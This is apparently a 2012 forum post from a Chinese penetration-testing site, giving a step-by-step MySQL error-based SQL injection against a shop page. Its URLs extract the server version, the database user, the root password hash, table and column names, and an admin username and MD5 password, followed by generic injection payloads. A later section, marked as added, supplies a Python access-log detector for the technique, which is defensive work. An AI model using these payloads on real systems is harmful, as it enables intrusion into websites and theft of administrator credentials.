中国网络渗透测试联盟

Title: Blind injection in detail

Author: admin    Time: 2012-9-5 14:59
Title: Blind injection in detail
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database table name
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database user_name column
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database password column
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin passwd (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
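Added detection example, not part of the original post: every payload above shares the same three ingredients (count(*), floor(rand()*2) and group by), so a defender can recognise the technique in web-server access logs by URL-decoding the query string and checking for all three together. The log lines, client IPs and paths below are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (hypothetical client IPs and paths).
# The third request carries the floor(rand()*2) payload from the post above.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2012:14:59:01 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [05/Sep/2012:14:59:05 +0800] "GET /search.php?q=group%20by%20date HTTP/1.1" 200 812',
    '10.0.0.9 - - [05/Sep/2012:14:59:09 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E'
    '(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from'
    '%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 231',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# The three ingredients of the duplicate-key trick. All three must be present,
# so an ordinary "group by" in a legitimate search query is not flagged.
INGREDIENTS = (
    re.compile(r"count\s*\(\s*\*\s*\)"),
    re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)"),
    re.compile(r"group\s+by"),
)
# What the payload tries to read back; used only to enrich the alert.
PROBE_RE = re.compile(r"select\s+(@@\w+|user\(\)|database\(\)|version\(\))")


def decode_query(url):
    """Return the query string of a request URL, fully URL-decoded and lower-cased."""
    query = urlsplit(url).query
    for _ in range(3):  # repeat so double-encoded payloads are decoded too
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query.lower()


def is_error_based_injection(query):
    return all(p.search(query) for p in INGREDIENTS)


def scan_log(lines):
    """Return (client_ip, probed_value) for every request carrying the signature."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = decode_query(m.group(1))
        if is_error_based_injection(query):
            probe = PROBE_RE.search(query)
            hits.append((line.split()[0], probe.group(1) if probe else "unknown"))
    return hits
```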




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2